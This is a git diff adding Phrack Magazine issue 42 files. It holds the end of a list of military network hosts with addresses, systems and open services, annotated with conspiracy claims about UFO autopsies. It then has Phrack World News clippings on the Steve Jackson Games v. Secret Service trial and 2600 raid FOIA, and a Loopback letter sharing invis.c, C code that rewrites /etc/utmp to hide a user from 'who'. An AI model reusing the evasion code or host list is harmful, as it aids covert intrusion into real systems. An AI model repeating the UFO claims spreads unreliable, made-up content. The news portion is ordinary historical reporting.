+     : TCP/FTP,TCP/TELNET,TCP/SMTP :
+HOST : 26.18.0.247 : PENTAGON-EMH4.ARMY.MIL : SPERRY-5000/80 : UNIX
+     : TCP/TELNET,TCP/FTP,TCP/SMTP :
+HOST : 26.26.0.247, 192.31.75.1 : PENTAGON-AI.ARMY.MIL : SUN-3/160 : UNIX
+     : TCP/TELNET,TCP/FTP,TCP/SMTP,TCP/FINGER :
+
+-----------------------------------------------------------------------
+
+Raddaman
+   Location of infamous building 18a.  Suspected saucers and others?
+
+DDN location, yet unknown.
+
+------------------------------------------------------------------------
+
+SECI
+     ?
+
+DDN Locations:
+--------------
+
+NET : 192.108.216.0 : ARC-SETI-NET :
+
+------------------------------------------------------------------------
+
+Utah Locations:
+
+GATEWAY : 26.18.0.20, 131.27.0.1 : HILL-GW.AF.MIL,HILLAFBNET-GW.AF.MIL
+       : CISCO-MGS :: IP/GW,EGP :
+
+GATEWAY : 26.18.0.20, 131.27.0.1 : HILL-GW.AF.MIL,HILLAFBNET-GW.AF.MIL
+        : CISCO-MGS :: IP/GW,EGP :
+
+HOST : 26.5.0.20 : HILL.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
+HOST : 26.0.0.99 : HILL2.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
+HOST : 26.12.0.99 : HILL-AM1.AF.MIL : WANG-VS100 : VS
+     : TCP/TELNET,TCP/FTP,TCP/SMTP :
+
+-------------------------------------------------------------------------
+
+Wright Patterson AFB
+ Catalogued UFO parts list.  Autopsies on record.  Bodies located in
+ underground facility of Foreign Technology Building.
+
+DDN Locations:
+--------------
+
+HOST : 26.0.0.47 : WRIGHTPAT.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
+HOST : 26.8.0.123 : WRIGHTPAT2.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
+HOST : 26.0.0.124 : WRIGHTPAT3.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
+HOST : 26.3.0.170 : WAINWRIGHT-IGNET.ARMY.MIL : CONVERGENT-TECH-CN-100
+     : CTOS ::
+HOST : 26.0.0.176 : WRIGHTPAT4.MT.DDN.MIL : C/30 : TAC : TCP,ICMP :
+
+-------------------------------------------------------------------------
+
+Nevada:
+
+NET : 131.216.0.0 : NEVADA :
+
+-------------------------------------------------------------------------
+
+Random Suspected Nets:
+
+WIN:
+  Top Secret Network.  All coordinator's have last name Win.
+
+NET : 141.8.0.0  : DFN-WIN8  : NET : 141.9.0.0  : DFN-WIN9  :
+NET : 141.10.0.0 : DFN-WIN10 : NET : 141.15.0.0 : DFN-WIN15 :
+NET : 141.25.0.0 : DFN-WIN25 : NET : 141.26.0.0 : DFN-WIN26 :
+NET : 141.28.0.0 : DFN-WIN28 : NET : 141.57.0.0 : DFN-WIN57 :
+NET : 141.58.0.0 : DFN-WIN58 : NET : 141.59.0.0 : DFN-WIN59 :
+NET : 141.60.0.0 : DFN-WIN60 : NET : 141.61.0.0 : DFN-WIN61 :
+NET : 141.62.0.0 : DFN-WIN62 : NET : 141.63.0.0 : DFN-WIN63 :
+NET : 141.64.0.0 : DFN-WIN64 : NET : 141.65.0.0 : DFN-WIN65 :
+NET : 141.66.0.0 : DFN-WIN66 : NET : 141.67.0.0 : DFN-WIN67 :
+NET : 141.68.0.0 : DFN-WIN68 : NET : 141.69.0.0 : DFN-WIN69 :
+NET : 141.70.0.0 : DFN-WIN70 : NET : 141.71.0.0 : DFN-WIN71 :
+NET : 141.72.0.0 : DFN-WIN72 : NET : 141.73.0.0 : DFN-WIN73 :
+NET : 141.74.0.0 : DFN-WIN74 : NET : 141.75.0.0 : DFN-WIN75 :
+NET : 141.76.0.0 : DFN-WIN76 : NET : 141.77.0.0 : DFN-WIN77 :
+NET : 141.78.0.0 : DFN-WIN78 : NET : 141.79.0.0 : DFN-WIN79 :
+NET : 141.80.0.0 : DFN-WIN80 : NET : 141.81.0.0 : DFN-WIN81 :
+NET : 141.82.0.0 : DFN-WIN82 : NET : 141.83.0.0 : DFN-WIN83 :
+NET : 141.84.0.0 : DFN-WIN84 : NET : 141.85.0.0 : DFN-WIN85 :
+NET : 141.86.0.0 : DFN-WIN86 : NET : 141.87.0.0 : DFN-WIN87 :
+NET : 141.88.0.0 : DFN-WIN88 : NET : 141.89.0.0 : DFN-WIN89 :
+NET : 141.90.0.0 : DFN-WIN90 : NET : 141.91.0.0 : DFN-WIN91 :
+NET : 141.92.0.0 : DFN-WIN92 : NET : 141.93.0.0 : DFN-WIN93 :
+NET : 141.94.0.0 : DFN-WIN94 : NET : 141.95.0.0 : DFN-WIN95 :
+NET : 141.96.0.0 : DFN-WIN96 : NET : 141.97.0.0 : DFN-WIN97 :
+NET : 141.98.0.0 : DFN-WIN98 : NET : 141.99.0.0 : DFN-WIN99 :
+NET : 188.1.0.0  : WIN-IP    : NET : 192.80.90.0 : WINDATA  :
+
+-----------------------------------
+
+Scinet:
+      Sensitive Compartmented Information Network
+
+NET : 192.12.188.0 : BU-SCINET :
+
+-----------------------------------
+
+Disnet:
+      Defense Integrated Secure Network.  Composed of SCINET, WINCS
+      ([World Wide Military and Command Control System] Intercomputer
+      Network Communication Subsystem), and Secretnet(WIN).
+
+NET : 22.0.0.0 : DISNET :
+
+-----------------------------------
diff --git a/phrack42/14.txt b/phrack42/14.txt
new file mode 100644
index 0000000..85c679c
--- /dev/null
+++ b/phrack42/14.txt
@@ -0,0 +1,588 @@
+                              ==Phrack Magazine==
+
+                  Volume Four, Issue Forty-Two, File 14 of 14
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+              STEVE JACKSON GAMES v. UNITED STATES SECRET SERVICE
+
+ Rights To Be Tested In Computer Trial                         January 20, 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Joe Abernathy (The Houston Chronicle)(Page A13)
+ *Reprinted With Permission*
+
+                        Summary Judgment Denied In Case
+
+AUSTIN -- A judge Tuesday denied plaintiff lawyers' request for summary
+judgment in a case brought against the U.S. Secret Service to set the bounds of
+constitutional protections for electronic publishing and electronic mail.
+
+U.S. District Judge Sam Sparks acted after hearing complicated arguments
+regarding application of 1st and 4th Amendment principles in  computer-based
+communications and publishing.  The case will go to trial at 9 a.m. today.
+
+"Uncontested facts show the government violated the Privacy Protection Act and
+the Electronic Communications Privacy Act," said Pete Kennedy, attorney for
+Steve Jackson Games, an Austin game company that brought the lawsuit.
+
+Mark W. Batten, attorney for the Department of Justice, which is defending the
+Secret Service, declined to comment on the proceedings.
+
+Steve Jackson's company, which publishes fantasy role-playing games -- not
+computer games -- was raided by the Secret Service on March 1, 1990, during a
+nationwide sweep of suspected criminal  computer hackers.
+
+Agents seized several computers and related hardware from the company and from
+the Austin home of Steve Jackson employee Loyd Blankenship.  Taken from the
+game publisher was an electronic bulletin board used to play-test games before
+they were printed and exchange electronic mail with customers and free-lance
+writers.
+
+Another seized computer contained the text of the company's work in progress,
+GURPS Cyberpunk, which was being prepared for the printers.
+
+Blankenship's purported membership in the Legion of Doom -- a group of computer
+hackers from Austin, Houston and New York -- led the Secret Service to Steve
+Jackson's door.
+
+Neither Jackson nor his company was suspected of wrongdoing.
+
+The game publisher is named in two paragraphs of the 42-paragraph affidavit
+requesting the 1990 search warrant, which targeted Blankenship -- a fact
+Kennedy cited in seeking summary judgment.
+
+Kennedy presented evidence that the original Secret Service affidavit for the
+warrant used to raid Steve Jackson Games contained false statements.
+Supporting documentation showed that Bellcore expert Henry Kluepfel disputes
+statements attributed to him that accounted for the only link between Steve
+Jackson Games and the suspicion Blankenship was engaged in illegal activity.
+
+Batten came away visibly shaken from questioning by Sparks, and later had a
+tense exchange with Kennedy outside the courtroom.
+
+The lawsuit contends the government violated 1st Amendment principles by
+denying the free speech and public assembly of callers to Jackson's bulletin
+board system, Illuminati.  This portion of the complaint was brought under the
+Privacy Protection Act, which also covers the seized Cyberpunk manuscripts --
+if the judge rules that such a book, stored electronically prior to
+publication, is entitled to the same protections as a printed work.
+The government lawyers argued the Privacy Protection Act applies only to
+journalistic organizations -- an argument Sparks didn't seem to buy.
+
+The lawsuit also contends 4th Amendment principles providing against
+unreasonable search and seizure were violated, on grounds the Electronic
+Communications Privacy Act specifies protection for publishers.
+
+The Justice Department contends electronic mail does not enjoy constitutional
+protections.
+
+"They (users of Illuminati) had no expectation of privacy in their electronic
+mail messages," Batten said.  The basis of the argument is that Illuminati's
+callers were not sending communications to others, but rather "revealing" them
+to a third party, Steve Jackson, thus negating their expectation of privacy.
+_______________________________________________________________________________
+
+ Computer Case Opens; Agent Admits Errors                      January 27, 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Joe Abernathy (The Houston Chronicle)(Page A11)
+ *Reprinted With Permission*
+
+AUSTIN -- Plaintiff's attorneys wrested two embarrassing admissions from the
+U.S. Secret Service on the opening day of a federal civil lawsuit designed to
+establish constitutional protections for electronic publishing and electronic
+mail.
+
+Special Agent Timothy Folly of Chicago admitted that crucial statements were
+erroneous in an affidavit he used to obtain warrants in a 1990 crackdown on
+computer crime.
+
+Foley also conceded that the Secret Service's special training for computer
+crime investigators overlooks any mention of a law that limits search-and-
+seizure at publishing operations.
+
+The case before U.S. District Judge Sam Sparks was brought by Steve Jackson
+Games, an Austin game publisher, with the support of electronic civil rights
+activists who contend that federal agents have overstepped constitutional
+bounds in their investigations of computer crime.
+
+Jackson supporters already have committed more than $200,000 to the litigation,
+which seeks $2 million in damages from the Secret Service and other defendants
+in connection with a March 1990 raid on Jackson Games.
+
+Plaintiffs hope to establish that First Amendment protections of the printed
+word extend to electronic information and to guarantee privacy protections for
+users of computer bulletin board systems, such as one called Illuminati that
+was taken in the raid.
+
+Steve Jackson's attorney, Jim George of Austin, focused on those issues in
+questioning Foley about the seizure of the personal computer on which
+Illuminati ran and another PC which contained the manuscript of a pending
+Jackson Games book release, "GURPS Cyberpunk."
+
+"At the Secret Service computer crime school, were you, as the agent in charge
+of this investigation, made aware of special rules for searching a publishing
+company?"  George asked Foley.  He was referring to the Privacy Protection Act,
+which states that police may not seize a work in progress from a publisher.  It
+does not specify what physical form such a work must take.
+
+Foley responded that the Secret Service does not teach its agents about those
+rules.
+
+Earlier, Foley admitted that his affidavit seeking court approval to raid
+Jackson Games contained an error.
+
+During the raid -- one of several dozen staged that day around the country in
+an investigation called Operation Sun Devil -- agents were seeking copies of a
+document hackers had taken from the computer system of BellSouth.
+
+No criminal charges have been filed against Jackson, his company, or others
+targeted in several Austin raids.  The alleged membership of Jackson employee
+Loyd Blankenship in the Legion of Doom hacker's group -- which was believed
+responsible for the BellSouth break-in -- lead agents to raid Jackson Games at
+the same time that Blankenship's Austin home was raided.
+
+Foley's affidavit stated that Bell investigator Henry Kluepfel had logged on to
+the Illuminati bulletin board and found possible evidence of a link between
+Jackson Games and the Legion of Doom.
+
+But George produced a statement from Kluepfel, who works for Bellcore, formerly
+AT&T Bell Labs, disputing statements attributed to him in the affidavit.  Foley
+acknowledged that part of the affidavit was erroneous.
+
+The U.S. Department of Justice, which is defending the Secret Service, contends
+that only traditional journalistic organizations enjoy the protections of the
+Privacy Protection Act and that users of electronic mail have no reasonable
+expectation of privacy.
+_______________________________________________________________________________
+
+ Judge Rebukes Secret Service For Austin Raid                  January 29, 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Joe Abernathy (The Houston Chronicle)(Page A21)
+ *Reprinted With Permission*
+
+AUSTIN -- A federal judge lambasted the U.S. Secret Service Thursday for
+failing to investigate properly before it seized equipment from three Austin
+locations in a 1990 crackdown on computer crime.
+
+U.S. District Judge Sam Sparks' comments came on the final day of trial in a
+lawsuit brought by Steve Jackson Games, an Austin publisher, with the support
+of national computer rights activists.
+
+The judge did not say when he will issue a formal ruling in the case.  In
+addition to seeking $ 2 million in damages from the Secret Service and other
+defendants, Jackson hopes to establish privacy and freedom of the press
+protections for electronic information.
+
+In a packed courtroom Thursday morning, Sparks dressed down Secret Service
+Special Agent Timothy Foley of Chicago, who was in charge of the March 1, 1990,
+raid on Jackson, one of his employees and a third Austin man.  No criminal
+charges have been filed in connection with the raids.
+
+"The Secret Service didn't do a good job in this case," Sparks said.  "We know
+no investigation took place.  Nobody ever gave any concern as to whether
+(legal) statutes were involved.  We know there was damage (to Jackson)."
+
+The Secret Service has seized dozens of computers since the nationwide
+crackdown began in 1990, but Jackson, a science fiction magazine and game book
+publisher, is the first to challenge the practice.  A computer seized at
+Jackson Games contained the manuscript for a pending book, and Jackson alleges,
+among other things, that the seizure violated the Privacy Protection Act, which
+prohibits seizure of publishers' works in progress.
+
+Agents testified that they were not trained in that law at the special Secret
+Service school on computer crime.
+
+Sparks grew visibly angry when testimony showed that Jackson never was
+suspected of a crime, that agents did no research to establish a criminal
+connection between the firm and the suspected illegal activities of an
+employee, and that they did not determine that the company was a publisher.
+
+"How long would it have taken you, Mr. Foley, to find out what Steve Jackson
+Games  did, what it was? " asked Sparks.  "An hour?
+
+"Was there any reason why, on March 2, you could not return to Steve Jackson
+Games a copy, in floppy disk form, of everything taken?
+
+"Did you read the article in Business Week magazine where it had a picture of
+Steve Jackson -- a law-abiding, tax-paying citizen -- saying he was a computer
+crime suspect?
+
+"Did it ever occur to you, Mr. Foley, that seizing this material could harm
+Steve Jackson economically? "
+
+Foley replied, "No, sir," but the judge offered his own answer:
+
+"You actually did; you just had no idea anybody would actually go out and hire
+a lawyer and sue you."
+
+The judge's rebuke apparently convinced the government to close its defense
+after the testimony from Foley, only one of several government witnesses on
+hand.  Justice Department attorney Mark Battan entered subdued testimony
+seeking to limit the award of monetary damages.
+
+The judge's comments came after cross-examination of Foley by Pete Kennedy,
+Jackson's attorney.
+
+Sparks questioned Foley about the raid, focusing on holes in the search
+warrant, why Jackson was not allowed to copy his work in progress after it was
+seized, and why his computers were not returned after the Secret Service
+analyzed them.
+
+"The examination took seven days, but you didn't give Steve Jackson's computers
+back for three months.  Why?" asked Sparks.
+
+"So here you are, with three computers, 300 floppy disks, an owner who was
+asking for it back, his attorney calling you, and what I want to know is why
+copies of everything couldn't be given back in days.  Not months.  Days.
+
+"That's what makes you mad about this case."
+
+Besides alleging that the seizure violated the Privacy Protection Act, Jackson
+alleged that since one of the computers was being used to run a bulletin board
+system containing private electronic mail, the seizure violated the Electronic
+Communications Privacy Act.
+
+Justice Department attorneys have refused comment on the case, but contended in
+court papers that Jackson Games is a manufacturer, and that only journalistic
+organizations can call upon the Privacy Protection Act.
+
+The government said that seizure of an electronic bulletin board system does
+not constitute interception of electronic mail.
+
+The Electronic Frontier Foundation committed more than $200,000 to the Jackson
+suit.  The EFF was founded by Mitchell Kapor of Lotus Technology amid a
+computer civil liberties movement sparked in large part by the Secret Service
+computer crime crackdown that included the Austin raids.
+
+"The dressing down of the Secret Service for their behavior is a major
+vindication of what we've been saying all along, which is that there were
+outrageous actions taken against Steve Jackson that hurt his business and sent
+a chilling effect to everyone using bulletin boards, and that there were larger
+principles at stake," said Kapor, contacted at his Cambridge, Massachusetts
+office.
+
+Shari Steele, who attended the trial as counsel for the EFF, said, "We're very
+happy with the way the case came out.  That session with the judge and Tim
+Foley is what a lawyer dreams about."
+_______________________________________________________________________________
+
+ Going Undercover In The Computer Underworld                   January 26, 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Ralph Blumenthal (The New York Times)(Page B1)
+
+  [A 36-year old law enforcement officer from the East Coast masquerades
+  as "Phrakr Trakr" throughout the nation's computer bulletin boards.
+  As the organizer of the High-Tech Crime Network, he has educated other
+  officers in over 28 states in the use of computer communications.
+  Their goal is to penetrate some 3000 underground bbses where computer
+  criminals trade in stolen information, child pornography and bomb
+  making instructions.
+
+  "I want to make more cops aware of high-tech crime," he said.  "The
+  victims are everybody.  We all end up paying for it."]
+_______________________________________________________________________________
+
+ Hackers Breaking Into UC Computers                            January 23, 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by T. Christian Miller (The San Francisco Chronicle)(Page A20)
+
+ [According to the University of California, hackers have been breaking
+  into the DOD and NASA through UC computer systems.  The investigation
+  links over 100 computer hackers who have reportedly penetrated
+  computers at UC Davis, UC Berkeley, NYU, FSU, and CSU.  The FBI stated
+  that the investigation reached as far as Finland and Czechoslovakia
+  but did not comment on any arrests.
+
+  University officials have asked all users to change to more complex
+  passwords by April 1.]
+
+_______________________________________________________________________________
+
+ Feds Sued Over Hacker Raid At Mall                            February 5, 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Joe Abernathy (The Houston Chronicle)(Page A5)
+
+ [A lawsuit was filed 2-4-93 in the Washington, D.C. federal court to
+  force the secret service to disclose its involvement in the disruption
+  of a meeting of computer hackers last year.  The meeting, a monthly
+  gathering of readers of "2600 Magazine" at the Pentagon City Mall was
+  disrupted on November 6, 1992, when mall security and Arlington County
+  Police questioned and searched the attendees.
+
+  The suit was filed by the Computer Professionals for Social
+  Responsibility.  "If this was a Secret Service operation, it raises
+  serious constitutional questions," said Marc Rotenberg, director of
+  CPSR.
+
+  The Secret Service declined to comment on the matter.]
+
+----------
+
+
+[New Info in 2600 Case - from email sent by CPSR]
+
+     One month after being sued under the Freedom of Information
+Act (FOIA), the Secret Service has officially acknowledged that
+it possesses "information relating to the breakup of a meeting
+of individuals at the Pentagon City Mall in Arlington, Virginia."
+The admission, contained in a letter to Computer Professionals for
+Social Responsibility (CPSR), confirms widespread suspicions that
+the agency played a role in the detention and search of
+individuals affiliated with "2600" Magazine at the suburban
+Washington mall on November 6, 1992.
+
+     CPSR filed suit against the Secret Service on February 4
+after the agency failed to respond to the organization's FOIA
+request within the statutory time limit.  In its recent response,
+the Secret Service released copies of three news clippings
+concerning the Pentagon City incident but withheld other
+information "because the documents in the requested file contain
+information compiled for law enforcement purposes."  While the
+agency asserts that it possesses no "documentation created by the
+Secret Service chronicling, reporting, or describing the breakup
+of the meeting," it does admit to possessing "information provided
+to the Secret Service by a confidential source which is
+information relating to the breakup of [the] meeting."  Federal
+agencies classify other law enforcement agencies and corporate
+entities, as well as individuals, as "confidential sources."
+
+     The propriety of the Secret Service's decision to withhold
+the material will be determined in CPSR's pending federal lawsuit.
+A copy of the agency's letter is reprinted below.
+
+David L. Sobel                               dsobel@washofc.cpsr.org
+Legal Counsel                                (202) 544-9240 (voice)
+CPSR Washington Office                       (202) 547-5481 (fax)
+
+************************************************
+
+
+                    DEPARTMENT OF THE TREASURY
+                   UNITED STATES SECRET SERVICE
+
+                                    MAR 5 1993
+
+                                    920508
+
+
+David L. Sobel
+Legal Counsel
+Computer Professionals for
+Social Responsibility
+666 Pennsylvania Avenue, S.E.
+Suite 303
+Washington, D.C.  20003
+
+Dear Mr. Sobel:
+
+This is in response to your Freedom of Information Act (FOIA)
+request for access to "copies of all records related to the
+breakup of a meeting of individuals affiliated with "2600
+Magazine" at the Pentagon City Mall in Arlington, Virginia on
+November 6, 1992."
+
+Enclosed, please find copies of materials which are responsive to
+your request and are being released to you in their entirety.
+
+Other information has been withheld because the documents in the
+requested file contain information compiled for law enforcement
+purposes.  Pursuant to Title 5, United States Code, Section
+552(b)(7)(A); (C); and (D), the information has been exempted
+since disclosure could reasonably be expected to interfere with
+enforcement proceedings; could reasonably be expected to
+constitute an unwarranted invasion of personal privacy to other
+persons; and could reasonably be expected to disclose the
+identity of a confidential source and/or information furnished by
+a confidential source.  The citations of the above exemptions are
+not to be construed as the only exemptions that are available
+under the Freedom of Information Act.
+
+In regard to this matter it is, however, noted that your FOIA
+request is somewhat vague and very broadly written.  Please be
+advised, that the information being withheld consists of
+information provided to the Secret Service by a confidential
+source which is information relating to the breakup of a meeting
+of individuals at the Pentagon City Mall in Arlington, Virginia,
+and, therefore, appears to be responsive to your request as it
+was written. If, however, the information you are seeking is
+information concerning the Secret Service's involvement in the
+breakup of this meeting, such as any type of documentation
+created by the Secret service chronicling, reporting, or
+describing the breakup of the meeting, please be advised that no
+such information exists.
+
+If you disagree with our determination, you have the right of
+administrative appeal within 35 days by writing to Freedom of
+Information Appeal, Deputy Director, U. S. Secret Service,
+1800 G Street, N.W., Washington, D.C. 20223.  If you choose to
+file an administrative appeal, please explain the basis of your
+appeal.
+
+                                    Sincerely,
+
+                                    /Sig/
+                                    Melvin E. Laska
+                                    ATSAIC
+                                    Freedom of Information &
+                                    Privacy Acts Officer
+
+Enclosure
+
+*******************************************
+
+For more information, refer to Phrack World News, Issue 41/1:
+
+ Reports of "Raid" on 2600 Washington Meeting                  November 9, 1992
+ Confusion About Secret Service Role In 2600 Washington Raid   November 7, 1992
+ Conflicting Stories In 2600 Raid; CRSR Files FOIA            November 11, 1992
+_______________________________________________________________________________
+
+ Surfing Off The Edge                                          February 8, 1993
+ ~~~~~~~~~~~~~~~~~~~~
+ by Richard Behar (Time Magazine)(Page 62)
+
+ [This article is so full of crap that I cannot even bring myself
+   to include a synopsis of it.  Go to the library and read it
+   and laugh.]
+_______________________________________________________________________________
+
+ Bulgarian Virus Writer, Scourge in the West, Hero at Home     January 29, 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by David Briscoe (Associated Press)
+
+ [The Dark Avenger, believed to be a computer programmer in Sophia, has
+  drawn the attention of computer crime squads in the US and Europe.  To
+  many programmers the Dark Avenger is a computer master to many young
+  Bulgarians.  "His work is elegant. ... He helps younger programmers.
+  He's a superhero to them," said David Stang director for the
+  International Virus Research Center.
+
+  Neither Bulgaria nor the US has laws against the writing of computer
+  viruses]
+_______________________________________________________________________________
+
+ Computer Security Tips Teach Tots To Take Byte Out Of Crime   February 3, 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Michelle Locke (Associated Press)
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+ Young Students Learn Why Computer Hacking Is Illegal         February 4, 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Bill Wallace (San Francisco Chronicle)(Page A22)
+
+ [In an attempt to teach computer crime prevention, children in
+  kindergarten through third grade in a Berkeley elementary school are
+  being shown a 30 minute presentation on ethics and security.
+
+  The program consists of several skits using puppets to show the
+  children various scenarios from eating food near computer systems to
+  proper password management.
+
+  In one episode, Gooseberry, a naive computer user, has her files
+  erased by Dirty Dan, the malicious hacker, when she neglects to log
+  off.
+
+  Philip Chapnick, director of the Computer Security Institute in San
+  Francisco, praised the idea.  "One of the major issues in information
+  security in companies now is awareness.  Starting the kids early ... I
+  think it will pay off," said Chapnick.]
+_______________________________________________________________________________
+
+Tracking Hackers - Experts Find Source In Adolescence       February 25, 1993
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Mike Langberg (Knight-Ridder News Service)
+
+[At the National Computer Security Association convention in San
+  Francisco, four experts analyzed the psyche of today's hacker.
+  The panel decided that hacker bonding came from a missing or defective
+  family.  The panel also decided that hackers weren't necessarily
+  geniuses, and that a few weeks of study would be enough to begin.
+
+  Panel member Winn Schwartau stated that there should be an end to
+  slap-on-the-wrist penalties.  Sending hackers to jail would send a
+  clear message to other hackers, according to Schwartau.
+
+  "What strikes me about hackers is their arrogance," said Michael
+  Kabay, computer security consultant from Montreal.  "These people seem
+  to feel that their own pleasures or resentments are of supreme
+  importance and that normal rules of behavior simply don't apply to
+  them."]
+_______________________________________________________________________________
+
+ Bomb Recipes Just A Keystroke Away                      January 10, 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Tracy Gordon Fox (The Hartford Courant)(Page B1)
+
+ [Teenagers gathering information via computer have contributed greatly
+  to the fifty percent increase in the number of homemade explosives
+  found last year.
+
+  The computer age has brought the recipes for the explosives to the
+  fingertips of anyone with a little computer knowledge and a modem.
+
+  One of the first police officers to discover that computers played a
+  part in a recent West Hartford, Connecticut, bombing said that
+  hackers were loners, who are socially dysfunctional, excel in
+  mathematics and science, and are "over motivated in one area."
+
+  The trend has been seen around the country.  The 958 bombing incidents
+  reported nationally to the Bureau of Alcohol, Tobacco and Firearms was
+  the highest in 15 years.]
+_______________________________________________________________________________
+
+ Hackers Hurt Cellular Industry                                January 25, 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by John Eckhouse (The San Francisco Chronicle)(Page C1)
+
+ [With only a little equipment and technical knowledge, telephone
+  pirates can make free calls and eavesdrop on cellular conversations.
+
+  "Technically, eavesdroping is possible, but realistically I don't
+  think it can be done," said Justin Jasche chief executive of Cellular One.
+
+  The Cellular Telecommunications Industry Association estimates that
+  hackers make about $300 million worth of unauthorized calls a year,
+  though others put the figure much higher.]
+
+-------------------------------------------------------------------------------
+
+ Cellular Phreaks and Code Dudes                         February 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by John Markoff  (Wired)  (page 60)
+
+ [Two hackers, V.T. and N.M. have discovered that celluar phones are
+  really just little computers linked by a gigantic cellular network.
+  And like most computers, they are programmable.  The hackers have
+  discovered that the OKI 900 has a special mode that will turn it into
+  a scanner, enabling them to listen in on other cellular conversations.
+
+  The two also discovered that the software stored in the phones ROM
+  takes up roughly 40K, leaving over 20K free to add in other features,
+  They speculate on the use of the cellular phone and a computer
+  to track users through cell sites, and to monitor and decode
+  touchtones of voice mail box codes and credit card numbers.
+
+  Said V.T. of the OKI's programmers, "This phone was clearly built by
+  hackers."]
+
+-------------------------------------------------------------------------------
+
+ Callers Invited To Talk Sex, Thanks To Hacker's Prank     February 5, 1993
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ (The Vancouver Sun) (Page A-9)
+
+ [For the past two weeks, surprised callers to CTC Payroll Services'
+  voice-mail system have been invited to talk sex.  Instead
+  of a pleasant, professional salutation, callers hear a man's voice
+  suggesting that they engage a variety of intimate activities.
+
+  The prankster is a computer hacker who can re-program the greeting message
+  on company telephones.  Company owner Cheryl MacLeod doesn't think the joke
+  is very funny and says the hacker is ruining her business.]
+_______________________________________________________________________________
diff --git a/phrack42/2.txt b/phrack42/2.txt
new file mode 100644
index 0000000..23814e1
--- /dev/null
+++ b/phrack42/2.txt
@@ -0,0 +1,1114 @@
+                          ==Phrack Magazine==
+
+              Volume Four, Issue Forty-Two, File 2a of 14
+
+                      [-=:< Phrack Loopback >:=-]
+============================================================================
+      !!!!WATCH THIS SPACE FOR SUMMERCON INFORMATION NEXT ISSUE!!!!
+============================================================================
+
+I 'found' this little C program a few days ago, and runs on most UNIX
+machines I think (As I found it, I cant claim fame for writing it!).
+
+What it does, is change your userid and x25 address to anything of your
+choice. This only affects programs such as 'write' and 'who'. It doesn't
+automatically give you different access rights, so it can only be used
+to disguise your real identity.
+
+Usage
+-----
+
+   inv god somewhere (Changes your uid to 'god' and X.25 to 'somewhere')
+   inv ''  ''        (Makes you INVISIBLE on 'who')
+
+Program invis.c
+---------------
+
+#include <stdio.h>
+#include <utmp.h>
+#include <sys/types.h>
+
+#include <lastlog.h>
+
+main(argc,argv)
+int argc;
+char *argv[];
+{
+ FILE *f;
+ struct utmp u;
+
+ int v=ttyslot(1);
+ if(v==-1)
+ {
+  fprintf(stderr,"Can't find terminal.\n");
+  exit(1);
+
+ if(argc!=3)
+ {
+  fprintf(stderr,"Args!\n");
+  exit(1);
+ }
+ f=fopen("/etc/utmp","r+");
+ if(f==NULL)
+ {
+  fprintf(stderr,"Utmp has escaped!\n");
+  exit(1);
+ }
+ if(fseek(f,v*sizeof(u),0)==-1)
+ {
+  fprintf(stderr,"Garbage utmp\n");
+  exit(1);
+ }
+ if(fread((char *)&u,sizeof(u),1,f)!=1)
+ {
+  fprintf(stderr,"Write failed\n");
+  exit(1);
+ }
+
+ strncpy(u.ut_name,argv[1],8);
+ strncpy(u.ut_host,argv[2],16);
+ if(fseek(f,v*sizeof(u),0)==-1)
+ {
+  fprintf(stderr,"Seek failed\n");
+  exit(1);
+ }
+ fwrite((char *)&u,sizeof(u),1,f);
+ fclose(f);
+}
+
+I personaly have not used this program (to hack or for anything else)
+What you do with it is up to you....,
+                                                            ________
+Have fun...., !!!                                          (        )____
+                                                          (  Alas, life  )
+                                                        (   is but an   )
+                                                        (    Aardvaark.. )
+                                                         (       __      )
+                                                      .   (_____)  (____)
+* * * * * * * * * * * * * * * *                     . ? .       ()
+* CHEERS_ THEN - _     _      *                       __      ()
+*   ___/_/______|_|___| |__   *                     /    \  ()
+*  |________   _______| |__|  *                    |_    _|
+*    / /    | | | |   | |     *                   |(0)||(0)|
+*   / /___  | | | |   | |     *                  /|_  \/  _|\
+*  /___  /  | | | |   | |     *                  || | == | ||
+*     / /   | | \  \__/ /     *                  || \____/ ||
+*    / /    |_|   \____/      *                 ///\  !!  /\\\
+*-*-/_/-*-*-*-*-*-*-*-*-*-*-*-*-=-=-=-=-=-=-=-=-!!!-!-=-=-!-!!!-=-=-=-=-=-=-=-=
+
+-------------------------------------------------------------------------------
+
+I am interested in getting in contact with hackers in Nord Italy
+(I am located in Torino). Do you know anybody ?
+
+Can you help TheNewHacker ??
+
+Thanks
+
+TheNewHacker
+
+[Editor:  Actually, we are in the process of recruiting people to
+          write for a compilation file on the hacking scenes in countries
